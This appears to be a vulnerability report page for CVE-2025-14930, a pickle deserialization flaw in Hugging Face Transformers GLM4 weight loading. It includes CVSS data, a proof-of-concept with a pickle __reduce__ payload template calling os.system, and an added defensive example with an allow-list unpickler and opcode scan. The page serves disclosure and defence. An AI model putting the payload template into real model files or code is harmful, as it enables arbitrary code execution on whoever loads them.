Security Vulnerability Report
CVE-2025-14930 CVSS 7.8 HIGH

CVE-2025-14930

Published: 2025-12-23 21:15:48
Last Modified: 2026-01-21 21:01:36

Description

Hugging Face Transformers GLM4 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of weights. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28309.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:huggingface:transformers:4.57.1:*:*:*:*:*:*:* - VULNERABLE (the only configuration NVD has analyzed)
Hugging Face Transformers < 4.x.x (fixed version pending official confirmation; not in the NVD configuration data)
Hugging Face Transformers GLM4 model-loading module, all versions (unconfirmed; NVD lists only 4.57.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
''' CVE-2025-14930 PoC - Hugging Face Transformers GLM4 Deserialization RCE
Note: This PoC is for educational and security research purposes only. '''
import pickle
import os
# Unused below: the real from_pretrained() call is commented out, so this
# import only documents the intended target and fails if transformers is absent.
from transformers import AutoModel, AutoTokenizer

# Malicious payload that executes arbitrary code during unpickling
class MaliciousPayload:
    def __reduce__(self):
        # This will execute calc.exe on Windows when unpickled
        cmd = "calc.exe"  # Replace with actual malicious command
        return (os.system, (cmd,))

# Generate malicious model file (simulated: nothing is written to disk and the
# pickle is never deserialized, so this script never runs the payload itself)
def create_malicious_model():
    malicious_data = pickle.dumps(MaliciousPayload())
    # Mock model-directory layout with a pickle-bearing weights file.
    # (A safetensors file cannot carry this payload; only pickle-based
    # checkpoints such as PyTorch .bin files can.)
    malicious_model = {
        "weight.bin": malicious_data,
        "config.json": '{"model_type":"glm"}'
    }
    return malicious_model

# Vulnerable code path
def load_vulnerable_model(model_path):
    """
    This function demonstrates the vulnerable code path.
    In a real attack scenario, the attacker would host the malicious model on
    the HuggingFace Hub or trick the user into loading it from an untrusted source.
    """
    try:
        # This would normally load from a local path or the HuggingFace Hub
        # model = AutoModel.from_pretrained(model_path)
        # tokenizer = AutoTokenizer.from_pretrained(model_path)
        print(f"[*] Loading model from: {model_path}")
        print("[*] Model loading vulnerable to deserialization attack")
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-14930 PoC - Hugging Face Transformers GLM4 RCE")
    print("=" * 60)
    # Create malicious payload
    malicious_model = create_malicious_model()
    print("[+] Created malicious payload")
    # Demonstrate the attack vector
    # In a real scenario, the attacker would upload to the HuggingFace Hub
    malicious_path = "malicious-glm4-model"
    print(f"[*] Attacker would host model at: {malicious_path}")
    print("[*] Victim would load with: AutoModel.from_pretrained('malicious-glm4-model')")
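The PoC above never deserializes anything, so it does not show the mechanism behind CWE-502 in a weights loader, nor why the CVSS vector is Local with User Interaction required (the attacker supplies a crafted checkpoint; the victim has to load it). The block below is an added example written for this page, not code from the ZDI advisory, NVD, or the Transformers project. It builds a pickle-based "weights" blob that executes code on load, runs it through the vulnerable pattern, and then shows two pickle-level defences: an allow-listing Unpickler and a static opcode scan with pickletools. Every name in it (MaliciousPayload, build_malicious_blob, RestrictedUnpickler, scan_pickle, attempt, the CVE_2025_14930_DEMO marker) and both blobs are constructed for the example; the payload sets an environment variable through builtins.exec instead of calling os.system so the effect is observable but harmless. It does not reproduce the GLM4-specific code path, which the advisory does not detail, and needs neither torch nor transformers.

```python
"""Added example for CVE-2025-14930 (not code from the ZDI advisory or the
Transformers project): a pickle-based "weights" blob that executes code when
loaded, the vulnerable loader pattern, and two pickle-level defences."""
import io
import os
import pickle
import pickletools

# The payload's only effect is to set this environment variable, so the demo
# is observable but harmless. A real payload would call os.system instead.
MARKER_VAR = "CVE_2025_14930_DEMO"


class MaliciousPayload:
    """Unpickling an instance runs arbitrary Python: the REDUCE opcode calls
    whatever callable the blob names (here builtins.exec) with its arguments."""

    def __reduce__(self):
        code = f"import os; os.environ[{MARKER_VAR!r}] = 'executed'"
        return (exec, (code,))


def build_malicious_blob():
    """Constructed attacker-controlled checkpoint bytes. Protocol 3 keeps the
    callable reference as a plain GLOBAL opcode without Python 2 name mapping."""
    return pickle.dumps(MaliciousPayload(), protocol=3)


def build_benign_blob():
    """Constructed stand-in for a legitimate state dict (no callables)."""
    state = {"layer.weight": [0.1, 0.2], "layer.bias": [0.0]}
    return pickle.dumps(state, protocol=3)


def payload_ran():
    """True once the malicious blob has been fully unpickled in this process."""
    return os.environ.get(MARKER_VAR) == "executed"


def load_unsafely(blob):
    """Vulnerable pattern (CWE-502): an unrestricted unpickle of untrusted
    bytes, which is what loading a pickle-based checkpoint without any
    global allow-list amounts to."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list unpickler: any global outside ALLOWED aborts the load before
    REDUCE can call it. Generic mitigation pattern, not the project's own fix."""

    ALLOWED = {
        ("builtins", "dict"), ("builtins", "list"), ("builtins", "tuple"),
        ("builtins", "set"), ("collections", "OrderedDict"),
    }

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def load_safely(blob):
    """Deserialize with the allow-list; raises UnpicklingError on a payload."""
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def attempt(loader, blob):
    """Run a loader and report the outcome instead of propagating the error."""
    try:
        return {"ok": True, "value": loader(blob), "error": None}
    except pickle.UnpicklingError as exc:
        return {"ok": False, "value": None, "error": str(exc)}


# Opcodes that resolve a global or invoke/construct something. A plain tensor
# state dict needs none of them, so their presence is a red flag for triage.
DANGEROUS_OPS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                 "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def scan_pickle(blob):
    """Static check that executes nothing: (offset, opcode, argument) for every
    dangerous opcode found in the blob."""
    return [(pos, op.name, arg)
            for op, arg, pos in pickletools.genops(blob)
            if op.name in DANGEROUS_OPS]


if __name__ == "__main__":
    bad, good = build_malicious_blob(), build_benign_blob()
    print("scan(benign)     :", scan_pickle(good))
    print("scan(malicious)  :", scan_pickle(bad))
    print("safe load (bad)  :", attempt(load_safely, bad))
    print("unsafe load (bad):", attempt(load_unsafely, bad),
          "payload ran:", payload_ran())
```

The allow-list is the same idea behind torch.load(weights_only=True), which restricts unpickling to tensor and container types; moving checkpoints to the safetensors format removes pickle from the load path entirely. Treat the opcode scan as triage rather than a gate: a GLOBAL or STACK_GLOBAL followed by REDUCE is how this class of payload reaches a callable, but the decision to refuse should be made by the loader, not by a separate scan that may be skipped.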

References

https://www.zerodayinitiative.com/advisories/ZDI-25-1145/ (Third Party Advisory; ZDI-CAN-28309)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14930", "sourceIdentifier": "[email protected]", "published": "2025-12-23T21:15:48.367", "lastModified": "2026-01-21T21:01:36.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hugging Face Transformers GLM4 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of weights. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28309."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:huggingface:transformers:4.57.1:*:*:*:*:*:*:*", "matchCriteriaId": "F9E8E4CE-5337-42CE-AC9D-C166600D41C6"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1145/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}